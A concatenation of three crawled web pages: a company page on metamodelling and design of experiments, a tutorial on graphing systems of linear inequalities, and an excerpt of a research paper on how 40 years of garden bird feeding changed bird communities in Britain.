In Idletechs we do this through our highly efficient experimental designs, to make the most cost-effective computer simulations of parameter combinations, spanning the whole relevant range of behavior with respect to the important statistical properties. Read more in Design of Experiments
The input-output relationship from the simulated data from the mechanistic model are described with the same methods that are used for modelling the relationship between empirical measurements of input and output. These so-called subspace regression methods, extensions of methods originally developed in the field of chemometrics (ref H. Martens & T Næs (1989) Multivariate Calibration. J. Wiley & Sons Ltd. Chichester UK), are fast to compute, give good input-output prediction models and are designed to give users a graphical overview and provide insight.
The laws of physics as implemented in the mechanistic model still apply in the obtained metamodels of the mechanistic model’s behavior. Only now the computations of outputs from inputs can run thousands of times faster, and without risk of local minima or lack of convergence.
Multivariate metamodelling can be used for a range of applications:
Most mechanistic models define how a system’s outputs depend on its inputs according to theory:
\(Outputs \approx F(Inputs)\)
The metamodel of such a theoretical, mechanistic mathematical model is a simpler statistical approximation model:
\(Outputs \approx f(Inputs)\)
A metamodel in this causal direction is guaranteed to give good descriptions of the mechanistic model’s outputs from its combination of inputs. Such a metamodel gives quantitative predictions and graphical insight into what are the most critical elements and stages hidden inside the mechanistic model itself. The user gets information at three levels:
Example: The known operating conditions of a furnace (e.g. electrode control, input current, raw material charge and cooling rate) predicts the inner, hidden position of the electrode tip, or the outer surface temperature and electromagnetic field.
Example: How certain combinations of operating conditions of the furnace should be able to predict its inner or outer properties.
Example: Why a combination of electrode control, input current and raw material charge seem to affect a combination of electrode tip and outer electromagnetic field, while a different combination of input current and cooling capacity seem to affect the surface temperature distribution.
In other words: The many input/output variations form distinct patterns of causalities that can monitored in real time, in particular if the model is fitted fast enough to relevant measurements.
Many mechanistic mathematical models are highly informative, but too slow for real-time updating. Examples: Nonlinear spatiotemporal dynamics of e.g. metallurgical reactions, or heating and cooling processes. A metamodel of such a slow mechanistic model may be developed to mimic its input/output behavior and make the computations much faster and more understandable.
To establish a metamodel of a mechanistic model requires some computer simulation work (mostly automatic) and some multivariate data analysis (requires our expertise). But this work is done once and for all. Once established, our metamodels run very fast, due to their mathematical form (low-dimensional bilinear subspace regressions).
Moreover, each time the original non-linear model is applied, it may give computational problems, such as local minima and lack-of-convergence. In contrast, its bilinear metamodel do not suffer in this way, for those problems were already dealt with during the metamodel development.
Various predicted Outputs predicted from a metamodel, e.g. the surface temperature distribution of an engine, may be compared to actually measured profiles of these Outputs, e.g. continuous thermal video monitoring of that engine. This allows us to infer the unknown causal Inputs – inner states and parameter values like unwanted changes in the inner combustion, heat conductivity or cooling of the engine.
One way to attain this is to search for already computed Output combinations that resemble the measured Output profile, starting with the previous simulation results.
But an even faster approach is also possible. In many cases it may be even more fruitful to invert the modelling direction, compared to the causal direction Output=f(Inputs):
\(Inputs \approx g(Outputs)\)
That can give an exceptionally fast way to predict unknown input conditions and inner process states from real-time output measurements.
In addition, the metamodel will automatically give warning of abnormality if it detects discrepancies between the predicted and measured temperature distribution of the engine surface. This facility is very sensitive, since it ignores patterns of variation that have already been determined to be OK.
Combine metamodel outputs with empirical measurements for a hybrid modelling approach that combines “the best of both worlds” and models the process as it really is.
Improving the process knowledge and also the mechanistic model.
It is generally a good idea to bring background knowledge into the interpretation of process measurements. Even though the boundary conditions may have changed, the laws of physics are the same.
Improving your old mechanistic model. The so-called subspace regression models also provide automatic outlier detection if and when new, unexpected process variation patterns are seen to develop in the measurements. These new pattern developments are used for generating warnings to the operators. Moreover, process properties that have changed are revealed and corrected in terms of model parameter settings that appear to change compared to what you expected. Thereby the combined meta-/data-modelling process helps you update the parameter values in your old mechanistic model.
But in addition, your old mechanistic model may not only be updated, but also expanded in this process: Unexpected, new variation patterns in the hybrid can be analyzed more depth, in terms of mechanistic mathematical equations, e.g. differential equation between the inner states, known or known, of your process. These model elements may be grafted onto the original mechanistic model, just like a new branch may be grafted onto the trunk of an old fruit tree. Thereby, your old mechanistic model becomes fully adapted to more modern times.
Some mechanistic models display an apparent weakness: Several different combinations of Input conditions can give more or less the same Output profile:
\(F(Inputs_1) \approx F(Inputs_2) \approx … F(Inputs_N) = Outputs\)
This means that the mechanistic model is mathematically ambiguous, in the sense that different input combinations may cause the system to behave in the same way.
Such a collection of parameter combinations with more or less equal effects on the system is called a “neutral parameter set”. And a mechanistic model with neutral parameter sets is called “mathematically sloppy”.
However, in an industrial setting, this apparent weakness may be turned into a great advantage. Assume that this ambiguity is a property of the physical system itself (e.g. a furnace or an engine), and not just due to an error in its mechanistic model.
Assume also that there are multiple key performance indicators (KPIs) for a given system. May be there are ways to optimize one key KPI, KPIKey, without sacrificing the other KPIs, KPIOther?
Then, for a process where a good mechanistic model shows such an ambiguity, its metamodel may list a range of different input combinations that may change KPIKey while not affecting KPIOther.
Seeing this type of ambiguity may allow you to find ways to optimize the Input conditions with respect to KPIKey without affecting the other desired process Output significantly. For instance, by studying the sloppiness of the mechanistic model (its many-inputs-to-one-output, e.g. discovered via its metamodel) you may find new ways to run an engine that reduce CO2 or fuel cost without sacrificing engine power. Or new and less risky ways to control the electrode positioning in a furnace without affecting its productivity.
Idletechs helps you to combine valuable information from both the mechanistic model (via its metamodel) and from modern measurements (e.g. thermal cameras etc), in a way that is understandable for operators and experts alike.
One of the essential tools in meta- and hybrid- modelling is Design of Experiments (DoE). Proper use of DoE ensures that the parameter space in the mechanistic and simulation-based models is described with a minimum number of combinations of the parameters of interest, i.e. the best subset of experimental runs. The traditional analysis of results from DoE, ANalysis Of VAriance (ANOVA) yields statistical inference w.r.t the importance of the parameters, and to distinguish real effects from noise. The multivariate subspace models gives detail insight into the relationship between samples and variables from experimental designs, specifically in situations with multiple outputs. Yet another important aspect in this context it that one can a priori estimate the danger of overlooking real effects by means of power estimation. No experiments should be performed before there exists an estimate of the uncertainty in the outputs of the model.
Furthermore, DOE will also clarify possible interaction effects which initially may not have been the considered in the mechanistic models. Derived input and output parameters might be added by so-called feature engineering; adding transforms of the initial parameters based on domain specific knowledge and theory. Temperature is e.g. rarely affecting a process in a linear way. The modern optimal designs also offer the definition of constraints as known in the system under observation, e.g. that some combinations of parameters will be give fatal outcome of the process. After the initial model has been established, the model can be numerically and graphically optimized, which is the basis for one or more confirmation runs for verification. | <urn:uuid:db7eb7fc-6a12-4cd6-861b-f5931fa04ecb> | CC-MAIN-2023-14 | https://idletechs.com/metamodelling/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948756.99/warc/CC-MAIN-20230328011555-20230328041555-00600.warc.gz | en | 0.907242 | 2,737 | 2.5625 | 3 |
Graphing Systems of Linear Inequalities
Graphing Systems of Linear Inequalities involves two inequalities in two variables x and y.
For graphing systems of inequalities we use a Cartesian plane or XY -plane. In that vertical line divides the plane in left and right part and slanting or oblique line divides the plane in upper and lower part. A point in the Cartesian plane will either lie on a line or will lie in either of the part.
Steps to graph the systems of inequality
(i) Solve the given inequality for y by following the rules of inequality of signs.
(ii) Graph the equation either using function table or using slope and y-intercept.
(iii) If the inequality is strict (< or >), graph a dotted line and if the inequality is not strict ($\geq or \leq$ ), draw a solid line.
(iv) Apply the Origin test
| Origin Test : Put x = 0 and y = 0 in the given equation after solving if the equation is true then origin (0,0) is included in the region and if false then set the region in which the origin is not included.
Lightly shade the half-plane that is the graph of the inequality. Colored
pencils may help you distinguish the different half-planes
Graph both the equations using the above rules, mark the region accordingly.For marking use the two different color pencils or dark and light shade to distinguish the two different region.The intersection or overlapping region formed by both the inequalities is the solution region.
Examples on graphing systems of linear inequalities
Example 1 :
Graph the system : y $\geq$ -3x - 2 and y < x + 3
y $\geq$ -3x - 2 ---------(1)
and y < x + 3 ------- (2)
Graph the 1st and 2nd equation using slope and y intercept.
Now put x = 0 and y = 0 in the 1st equation ,
0 $\geq$ - 3(0) -2
0 $\geq$ -2
Which is true, so origin is included for the 1st inequality.
So after graphing an equation we will mark right region of the line which includes origin.
2nd equation ⇒
0 < 0 + 3
0 < 3
which is also true, so origin is also included in 2nd inequality.
So after graphing an equation we will mark the lower region of the line which includes origin.
From the above graphs we can see that in A region from 1st graph, there is a solid line as the inequality is not strict. In region B, 2nd graph there is a dotted line as there is strict inequality. The 3rd graph both region A and B are overlapped and region c is intersection region. So region C is the solution.
11th grade math
From graphing systems of linear inequalities to Home | <urn:uuid:39f64b3b-ac37-4cff-a3e9-e2b6acb19bd3> | CC-MAIN-2023-14 | https://www.ask-math.com/graphing-systems-of-linear-inequalities.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949009.11/warc/CC-MAIN-20230329151629-20230329181629-00001.warc.gz | en | 0.929625 | 619 | 4.53125 | 5 |
There is a multi-billion dollar global industry dedicated to feeding wild birds in residential gardens. This extraordinary boost to food resources is almost certainly reshaping entire bird communities, yet the large-scale, long-term impacts on community ecology remain unknown. Here we reveal a 40-year transformation of the bird communities using garden bird feeders in Britain, and provide evidence to suggest how this may have contributed to national-scale population changes. We find that increases in bird diversity at feeders are associated with increasing community evenness, as species previously rarely observed in gardens have increasingly exploited the growing variety of foods on offer over time. Urban areas of Britain are consequently nurturing growing populations of feeder-using bird species, while the populations of species that do not use feeders remain unchanged. Our findings illustrate the on-going, gross impact people can have on bird community structure across large spatial scales.
Food availability may be the single most important factor determining the size and distribution of animal populations. Winter food availability, in particular, plays a critical role in regulating bird populations in seasonal environments1, with over-winter survival a key cause of population change for many terrestrial bird species2,3,4. In much of Europe and North America, the deliberate provision of food in domestic gardens and yards (garden bird feeding) has modified the winter resource base for birds extensively5, helping to buffer against environmental drivers that operate through changes in natural food abundance6. In Britain, for example, homeowners are reportedly providing enough supplementary food to support approximately 196 million birds, far exceeding the combined, total population of many common garden species7. This massive human intervention is likely to be having profound repercussions on the bird communities around us5.
Early feeding pioneers attracted a relatively simple bird community to gardens using kitchen scraps and home-made table feeders5. However, the practice has changed substantially since becoming commercialised in the mid-20th century8. It now seemingly benefits a much broader bird community, although it is unclear whether or not some species may have lost out due to heightened interspecific competition for access to supplementary foods9,10. Previous research has demonstrated that the distribution of feeders across a city can predict avian abundance patterns for some species11, with bird community composition also reacting promptly to the introduction and removal of feeding stations12. This would suggest that garden bird feeding is capable of supporting local populations and enhancing bird numbers, at least in the short-term. The availability and nutritional value of anthropogenic foods are also likely to have substantial impacts (both positive and negative) on the health, survival and breeding outputs of wild birds3,13,14. But ultimately, how these effects scale up to influence bird community dynamics and population trajectories across entire landscapes is still unknown.
In Britain, gardens cumulatively account for approximately one quarter of all urban land cover15 and play an important role in supporting the national populations of many bird species16,17,18. Given our awareness that at least half of British homeowners feed the birds in their gardens7,19, and our growing understanding of the extensive ecological and evolutionary impacts of supplementary food use, it is reasonable to predict that garden bird feeding might also be influencing bird communities across large spatial scales. The supply and uptake of garden bird food during winter has been monitored throughout Britain since the 1970s, via the Garden Bird Feeding Survey (GBFS, Supplementary Fig. 1), providing a unique opportunity to study long-term shifts in bird communities in response to large-scale food supplementation. Here, first, we characterise real-time growth and innovation within the garden bird feeding industry. Then, using data extracted over a 40-year time series, we demonstrate that, over time, food resources provided by the British public have altered the composition of bird communities utilising garden bird feeders and, consequently, have helped to shape the national populations of birds in Britain today.
Results and Discussion
Garden bird feeding industry
To quantify long-term changes to garden bird feeding in Britain, we conducted a comprehensive review of advertising in Birds—a charity membership magazine reaching more than 2 million readers20—published between 1973 and 2005. By definition, the magazine’s audience have a keen interest in birds and their conservation, thus representing the target market for companies selling popular and novel feeding products. Since brand advertising is known to impact total industry demand21, advertising patterns in Birds are expected to provide meaningful indices of consumers’ garden bird feeding habits.
The proportion of advertising space dedicated to the bird feeding industry increased significantly over time (\(\chi _1^2\) = 26.19, df = 2.62, p < 0.001; Supplementary Fig. 2), indicating the rising popularity of feeding wild birds. After accounting for changes to advertising practices, we revealed upward trajectories in the total numbers of food (F = 178.1, df = 3.15, p < 0.001) and feeder (F = 187.9, df = 3.70, p < 0.001) products on offer, including exponential increases from 1980 onwards (Fig. 1; Supplementary Fig. 2). The number of food types available (\(\chi _1^2\) = 8.06, p = 0.005) and their diversity (Simpson’s Index, \(\chi _1^2\) = 7.26, p = 0.007) also grew significantly (Supplementary Table 1; Supplementary Fig. 2). Specialist foods, such as sunflower hearts and fat balls, first appeared in the 1990s (Fig. 1) as companies, supported by conservation bodies, deliberately diversified their products to attract more species5. This broadening of food resources, added to the potential for selective provisioning by homeowners, may have both influenced and complicated bird community responses to increases in food quantity.
Community changes at garden bird feeders
Using 40 years of GBFS data from 1973/74 to 2012/13, we identified 133 bird species using garden feeders during winter, equating to 52.6% of all species, excluding vagrants, found in Britain22 (Supplementary Table 2). We analysed the long-term trends in community composition, nationally (using a single, rarefied time-series) and within individual gardens (using mixed effects modelling), to examine evidence of bird community adaptation in response to evolving feeding practices (see Methods section).
Across Britain, there has been a highly significant increase in the diversity of birds using garden bird feeders since the 1970s, according to Simpson’s Diversity Index (F = 355.0, df = 3.52, p < 0.001; Fig. 2a). Although, nationally, the same suite of species have continued to use feeders over time (\(\chi _1^2\) = 0.00, p = 0.99; Fig. 2c), homeowners are encountering an increasingly species-rich (F = 143.5, df = 2.99, p < 0.001; Fig. 2d) and diverse (F = 123.0, df = 2.92, p < 0.001; Fig. 2b) community of birds visiting the feeders in their individual gardens.
This combination of large- (national-) and small- (garden-) scale patterns suggests that many species have become more abundant at garden feeders over time, potentially resulting in a change in species dominance within the feeder-using community. Indeed, a comparison of k-dominance curves from each year revealed a clear pattern of increasing evenness over time (Fig. 2e). Most notably for example, approximately half of all birds using feeders belonged to just two species in the 1970s, but by the 2010s, the number of species making up the same proportion of the community had more than tripled. We examined the possibility that this finding might purely reflect the changing spatial ranges of British birds23, potentially influencing community trends by bringing more wintering bird species in contact with monitored feeders over time. However, the median net change in the proportion of GBFS gardens located within a species’ range between 1981 and 2011 was only 2.49% (n = 130)24,25. This suggests that garden bird feeders, specifically, could be responsible for attracting more individuals across a greater species range as time has passed.
We used GBFS data on the numbers of hanging, table and ground feeding units (collectively termed feeders) to evaluate the importance of garden bird food availability in driving community patterns directly. As expected, individual homeowners supplied an increasing number of feeders (F1,6431 = 195.6, p < 0.001), particularly hanging feeders (F1,6431 = 297.2, p < 0.001), over time (Supplementary Fig. 3). It is reasonable to assume that this increase in feeder numbers also reflects the greater variety in food types that became available during the same timeframe, since homeowners are likely to aim to attract more species by diversifying food provision, rather than simply increasing provision of the same foods.
Changes in bird communities across the British countryside have previously been shown to be at least partially linked to climate change and urbanisation26,27. Indeed, variation in garden use by birds is also known to be associated with winter temperatures and local habitat characteristics18,28. But interestingly, when we included all of these potential drivers as covariates in the modelling of bird community temporal trends, we found that the number of feeders provided in a garden had a greater influence on species richness and diversity than either winter temperature or local habitat (Supplementary Fig. 4). It therefore seems that the broad temporal changes observed at garden bird feeders could be the result of the cumulative changes in food provisioning across multiple gardens, allowing species rarely observed at the start of the time-series to take better advantage of feeders over time.
Well-defined interspecific dominance hierarchies are known to exist at bird feeders, as species of different sizes and competitive strengths fight for to access food supplements9,29. Our findings suggest that, by increasing the number of feeders available in gardens, this has reduced the capacity for resource monopolisation by any one species. Concurrent increases in the diversity of food and feeder types on offer are also likely to have led to greater opportunities for species with more specialist foraging requirements. To this end, the continuing modifications made by homeowners to their feeding practices appear to have contributed significantly to the changing composition of bird communities in gardens.
Links to national population change
It would seem that the composition of bird communities exploiting garden bird food has changed in parallel with evolving feeding practices. More generally, community changes in terrestrial birds are likely to be the product of many different factors, including climate, habitat change, resource availability, conditions in breeding/wintering grounds or on migration, disease, competition and predation. Indeed, as previously mentioned, wider community changes have occurred across Britain27, and therefore it is feasible that apparent increases in feeder use could merely reflect the greater detection of birds whose populations have grown through a mechanism unrelated to garden bird feeding. So, are changing feeder communities simply reflecting these wider patterns18, or could feeding actually be a driver of population change?
To answer this, first, we needed evidence that there is a real association between the use of garden bird feeders during winter and concurrent changes in species’ population sizes. Species that regularly visit garden feeders are most likely to experience population-level impacts of supplementary food use. Therefore, we identified 39 species that regularly visit garden feeders (feeder-users) and tested whether independent estimates of their national breeding population trends, derived from Massimino et al.30, could be linked to shifting winter feeder usage. Feeder use—the proportion of gardens where each species used feeders—increased by an average of 14.9% (s.e.m. 4.0%) between 1973 and 2012, with two thirds of species showing a significant positive change (Fig. 3a; Supplementary Table 3). Further, these changes were found to be significantly associated with national population changes over the same timeframe (r2 = 0.43, F1,29 = 21.82, p < 0.001; Fig. 3b). We accounted for phylogeny in our analysis, under the assumption that more closely related species would be more similar in their tendency to use feeders and in the extent to which their populations change. Indeed, the estimate of Pagel’s lambda (a measure of the phylogenetic signal) for species population change was significantly different from zero (λ = 0.94, p = 0.014). However, there was no evidence that feeder use was influenced by phylogeny (λ < 0.001, p = 0.15), and the optimised lambda value from the regression model (λ < 0.001) denotes very limited covariance between feeder use and species’ population change (distinct from the explanatory power of feeder use per se). Feeder use is typically associated with passerine birds5, but, with use of supplementary food evident across the phylogenetic tree (Supplementary Fig. 5), these findings give a strong indication that the proliferation of feeder use within bird communities is independent of species’ inter-relatedness.
Previous research has demonstrated that, across species, bird population trends are significantly reduced in urban areas compared to other habitats31. Therefore, to understand whether feeding, specifically, could be contributing to the wider population changes reported, we needed to be able to separate the influence of feeder use from other co-varying drivers of garden bird numbers that also operate along a gradient of urbanisation32. To achieve this, we focused our analysis on the changes in bird populations occuring in urban areas of Britain only, where garden bird feeders are widely accessible to all birds19, allowing us to test the effect of feeding independently of any other potential influences associated with the urban gradient32. Using all available trends for species (n = 72) occurring in urban areas of Britain (namely, all urban, suburban and rural human-dominated habitats31) we tested for a difference in the urban population trends for the species that regularly use garden feeders (n = 33), compared to those which do not (n = 39). Compellingly, feeder-users had significantly different population trajectories from those species with equal access to, but which do not commonly visit, feeders (F1,70 = 7.43, p = 0.008; Fig. 3c), with no phylogenetic influence (Pagel’s λ < 0.001). In fact, while there was no overall directional change for the species that do not use feeders, by comparison populations of feeder-users increased significantly (Fig. 3c).
Since these results do not distinguish cause and effect between increasing supplementary food use and population growth definitively, we checked whether or not similar differences between the two species groups also occured throughout the rest of Britain (i.e. non-urban areas). Finding the same pattern would suggest that the differences observed in urban areas are reflecting broader population changes, with birds moving into gardens in approximate proportion to their availability by area, following something like an ideal free distribution across the wider countryside33. However, we found no difference between the non-urban trends for these groups (F1,70 = 1.71, p = 0.196), implying that the relationship is more likely to have resulted from birds choosing to use garden feeders than from them expanding their habitat use due to population growth. While many other factors are certain to influence interspecific variation in trends, these findings provide the first landscape scale evidence consistent with garden bird feeding having influenced population change.
Wild bird feeding has become engrained into human culture across many areas of the world within the last half-century, to the extend that this seemingly small-scale activity is now frequently acknowledged for its demonstrable benefits to human well-being5,34,35,36,37. Nonetheless, the historical basis for feeding wild birds began with the perception that, by providing food during winter, one can improve the survival prospects of vulnerable individual birds5. Changes to bird feeding activities conducted in gardens are already reported to have resulted in stark ecological and evolutionary responses within some individual bird species38,39. Our findings indicate that the consequences of feeding reach further still, with evidence that this habitual human activity is also associated with the national-scale restructuring of bird communities.
Intuitively, the types of food provided should affect the types of species attracted10,12. Our results indicate that the diversifying commercial bird food market has enabled a growing number of species to exploit supplementary foods over time, while some appear to have lost out as a result of behaviourally dominant or better adapted species becoming more common within the community. Indeed, the bird assemblage that commonly uses feeders (Fig. 3a) includes species of high conservation concern30, species capable of promoting human well-being40 and species considered common pests41. Feeding is, therefore, highly likely to have already had important effects, and greater coordination of feeding activities, across networks of gardens and at multiple spatial scales, could be an innovative way of delivering large-scale conservation or species management outcomes in the future42.
Feeding birds is a growing practice throughout the world, with many people shifting from traditional, winter-only feeding to provisioning all year round5. If feeding continues to intensify, it will likely exacerbate the species- and community-level consequences observed here. Greater food diversity, innovation in feeder design, variation in food quality and behavioural adaptation by birds all have the potential to influence the frequency of feeder use and the benefits or detrimental impacts accrued, with downstream consequences for population sizes and community structure. The positive influences of feeder use on population size reported here are likely to be the product of a combination of improved survival3,4, better physiological condition13,43 and increased productivity44 among the individuals frequenting feeders. However, negative impacts of supplementary feeding have been widely reported, particularly those associated with increased disease transmission at feeders and the poor nutritional quality of food supplements45,46,47,48. Further research is needed to determine whether, and how, these might limit population growth. Individual decisions by homeowners to feed wild birds can impact cumulatively upon bird communities across large spatial scales. As such this growing, global phenomenon has profound potential to influence biodiversity further and should not be underestimated.
Evidence of garden bird feeding industry change
Garden bird feeding industry data were derived from advertisements featured in Birds magazine; a free publication, widely distributed to members of the Royal Society for the Protection of Birds (RSPB; recent membership figures totalled over 1.2 million49). Our assessment focused on all advertisements promoting garden bird food and/or feeder products in the Autumn editions of Birds from 1973 to 2005. After 2005, advertising was biased toward RSPB-branded products. Over the 33-year period considered, the number of pages featuring all forms of advertising in Birds increased linearly (GLS \(\chi _1^2\) = 26.19, p < 0.001), correlated with a general increase in magazine length (r = 0.901, n = 33, p < 0.001). For every advertisement (n = 179), we extracted data for its size (proportion of page covered), and the names and descriptions of individual food and feeder products. Foods were also allocated to one of 21 different food type categories (see Supplementary Table 1) using product descriptions, images and online information.
To test for temporal changes in supplementary food quantites, the food and feeder product ranges from all advertisements were summed (respectively) per magazine (n = 33). To test for temporal changes in supplementary food diversity, we quantified the number and diversity (using Simpson’s diversity index) of food types represented in each magazine. We ruled out the possibility that observed patterns were confounded by increased advertising space by controlling for the total number of pages featuring bird feeding industry advertisements (advertising pages). Number of bird food products and number of feeder products were modelled seperately as a function of a year smooth using generalised linear models (GAMs), with a Poisson error distribution. Advertising pages was also log-transformed and included as an offset, since the numbers of products advertised was expected to be proporitional the the total amount fo advertising space available. The number of different food types and food diversity over time were modelled as a function of year using generalised least squares (GLS) with advertising pages included as a covariate. Food type number was log-transformed to reach normality of the residuals. In a further test for overall growth in the bird food industry, we modelled the proportion of total advertising space dedicated to feeding products as a function of a year smooth using a GAM. Full details about model specifications are given below.
Garden Bird Feeding Survey
Data from the Garden Bird Feeding Survey (GBFS) were used to investigate changes in bird communities at feeders in mainland Britain between winter 1973/4 and winter 2012/13 (40 years). GBFS is an annual survey monitoring the number of birds visiting feeders in domestic gardens over a 26-week period from October to March (www.bto.org/gbfs). The survey comprises an average of 217.8 (s.e.m. 7.1) gardens each year, covering a representative range of garden types (suburban/urban and rural) and a consistent geographic distribution. Participants leaving the scheme are replaced with new volunteers from the same region, and with gardens of a similar type and size.
Survey participants record the maximum number of each bird species observed simultaneously using feeders (i.e. at/on feeders and in their vicinity) each week or, in the case of sparrowhawk, feeding on birds using feeders. Data for all species known to occur in Britain according to the British Bird List22, except vagrants (n = 6 species), were used to estimate community indices (n = 133; Supplementary Table 2). Scarce migrants, summer migrants (recorded at the beginning or end of the winter period) and species not traditionally considered as garden visitors (e.g. wetland birds) were retained to avoid removing evidence of community change. Records for domestic and aviary species were excluded (n = 21). Species with ambiguous identification, such as marsh tit and willow tit, were combined. Changes in community composition are unlikely to have been biased by long-term changes in the arrival and departure of British breeding migrants, since estimated phenological shifts are not large enough to have noticibly increased the probablity of these migrants being recorded by GBFS50. Similarly, although volunteer field-skills are not formally controlled, there is no reason to suspect spatial biases or temporal change in the accuracy of species’ identification and counts.
Since diversity estimates are influenced by sampling effort51, the data were restricted to gardens with at least 20 weekly submissions for a given winter (mean = 25.13 weeks), as this number of replicates was seen to produce reliable species richness and species-specific abundance measures. More specifically, species accumulation curves, averaged across gardens each winter, reached an asymptote with 20 weeks of surveying. Further, we used general linear mixed models (GLMMs) controlling for garden and year random effects to verify that increasing sampling effort over 20 weeks had no effect on winter abundance (defined as the maximum count observed in a garden across all weeks surveyed). Winter abundance was independent of sampling effort in 94% of species (n = 125/133), significantly more than expected by chance (z-test, χ2 = 101.2, p < 0.001, 95% CI = 89.2 – 100.0%). We note that maximum counts provide an accurate (asymptotic) means of comparing changes in relative abundances across species, but probably under-represent true abundance.
The filtered data set used to conduct the analyses comprised 1,001 GBFS gardens in mainland Britain (mean ± s.e.m. per year = 185.8 ± 6.1) that contributed a total of 186,825 weekly submissions over the 40-year survey period (Supplementary Fig. 1). We do not expect the data set to contain any biases that might influence the observed findings, given that the data were collected across a consistent set of gardens using structured sampling to a defined protocol, and that the species list has been carefully validated and sampling effort controlled. Any erroneous data, for example due to species misidentification, should be a source of noise rather than bias.
Potential drivers of bird community change
To estimate the potential for species’ spatial range shifts to impact measures of community temporal change, distribution data from the 1981/82–1983/84 Winter Atlas25 were compared with equivalent data from Bird Atlas 2007–201124 to identify areas where a species had apparently colonised or apparently disappeared at a 10-km resolution. Data were available for 98% (n = 130) of all species represented in the GBFS data set (Supplementary Table 2); three species were not recorded during either winter atlas period. GBFS gardens were assigned data from the 10-km squares in which they were located, allowing the net change in the number of GBFS gardens located within a species’ range to be calculated and averaged across all species (using the median due to data skew).
In addition to examining bird community changes through time, three potential drivers of garden bird feeder use were also considered: number of feeders, winter temperature18 and local habitat28. The numbers of hanging feeders, bird tables and ground feeding stations (collectively termed feeders) were recorded each week in surveyed gardens. Weekly feeder numbers were averaged annually by feeder type and in total, to provide an indicator of supplementary food availability throughout winter in each garden. To examine changes in the provision of garden bird feeders over time, numbers of feeders, in total and by feeder type, were log-transformed and fitted separately against year using linear mixed models (LMM) with garden identity included as a random effect. The log-linear functional relationship, which specifies the percentage change in numbers of feeders over time, was applied to achieve normality of the residuals.
Gardens were classified as either suburban/urban or rural according to their surrounding habitat. Suburban/urban includes gardens in areas with a mix of built cover and green space, or in dense urban areas with little vegetation, such as town centres. Rural includes gardens in areas away from towns, with just a few scattered houses, farms or other isolated buildings. The difference in garden habitat types was verified using Land Cover Map 199052, which showed that rural gardens were located in 1-km squares with significantly less urban cover on average than suburban/urban gardens (rural = 12.04% ± 0.70 s.e.m.; suburban/urban = 42.66% ± 1.06; χ2 = 40265, p < 0.001). Gardens were re-classified from rural to suburban/urban if urban encroachment occurred (n = 6 gardens), but garden identity remained unchanged.
We expected that weather conditions throughout the whole bird data collection period would have a greater influence feeder use than extreme weather events. Therefore, annual measures of average winter temperature were estimated using mean monthly temperature for October – March and used to test for climatic effects on feeder use. Mean monthly temperature (°C) data were extracted from the UK Meteorological Office Climate Projections (UKCP09) 5 × 5-km resolution gridded data set53. Gardens were assigned averaged winter temperature data for the 5-km square in which they were located.
Evidence of bird community change
We used annual measures of species richness, Simpson’s diversity index and k-dominance to examine bird community patterns. Species richness was the total number of species observed throughout the winter. Simpson’s diversity index was used to provide a robust and meaningful measure of community diversity per winter51. Since Simpson’s diversity incorporates both the number of species present and their relative abundances, its comparison with species richness was also used to infer changes in bird community evenness. k-dominance curves—which plot the cumulative abundances of all species in a community (as percentages) against their species rank (logged)—were used to study changes in community evenness over time51. We used species abundance and rank, averaged annually across gardens, to compare k-dominance curves from each year of the time-series. The higher the curve, the less diverse and more uneven the community it represented.
To estimate national indices of species richness and Simpson’s diversity, we compiled data from all gardens into a single time-series, then applied sample-based rarefaction to standardise sampling effort through time54. Specifically, 115 gardens (equivalent to the minimum number surveyed in a single year) were randomly resampled without replacement from the total pool of gardens surveyed per year to achieve a consistent sample size over time. For each year, data from all resampled gardens were pooled and species richness and Simpson’s diversity calculated. Resampling was repeated for 1000 iterations and diversity measures averaged. Confidence intervals were not generated, since estimates derived from rarefaction are dependent on the size of the subsample and are therefore not informative about sample variability. The rarefied measures of Simpson’s diversity and species richness were modelled separately to quantify national-scale bird community trends. Simpson’s diversity was fitted against a year smooth using a GAM, and species richness was fitted against year using GLS regression.
To assess bird community trends at the garden scale, annual measures of species richness and Simpson’s diversity per garden were fitted using generalised additive mixed models (GAMMs) with garden identity included as a random term (n = 7433 garden-years). To evaluate the influence of other garden use drivers on bird community change, we also included number of feeders, winter temperature and habitat as fixed effects. These terms were standardised to a mean of 0 and s.d. of 0.5 to enable effect sizes to be compared directly55.
Linking feeder use to national population change
Since feeder use would need to be reasonably prevalent within a population to incur national-scale impacts, we focused on species that regularly used feeders when testing for associations between changing feeder use and changes to population size. Data were combined across all gardens per year to derive a single, intuitive index of overall feeder use per species in Britain, defined as the proportion of GBFS gardens in which a species was observed using feeders. Using site occupancy to derive feeder use, as opposed to species abundance, produces an easily interpreted measure of the scale of feeder use nationally, while also minimising the influence of stochastic variation in species counts. We conservatively defined species that regularly used feeders (feeder-users) as those with a mean feeder use of ≥ 0.1 (i.e., observed in an average of 10% of surveyed gardens per year across the study period; n = 39 species; Supplementary Table 3).
For all feeder-users, a binomial generalised linear model, testing the difference in feeder use between the first and last three years in the time-series (1973/4–1975/6 vs. 2010/11–2012/13), was used to estimate the value and significance of net change in feeder use. This approach was used as it could produce a measure of change that was analogous with estimates of national breeding population change over the same timeframe, while also minimising any influence of inter-annual stochasticity and avoiding assumptions about the shape of the temporal trend. More specifically, breeding population changes for feeder-users were similarly calculated as the difference between smoothed annual indices for 1974 and 2013 (i.e. the breeding seasons immediately following the beginning and end of the time-series), derived from the joint Common Bird Census/Breeding Bird Survey (CBC/BBS) trends for England30. CBC and BBS use structured, stratified protocols to monitor national bird populations and inform the UK Biodiversity Indicators. Trends were not available for eight feeder-user species, which included winter migrants and species not well covered by the CBC.
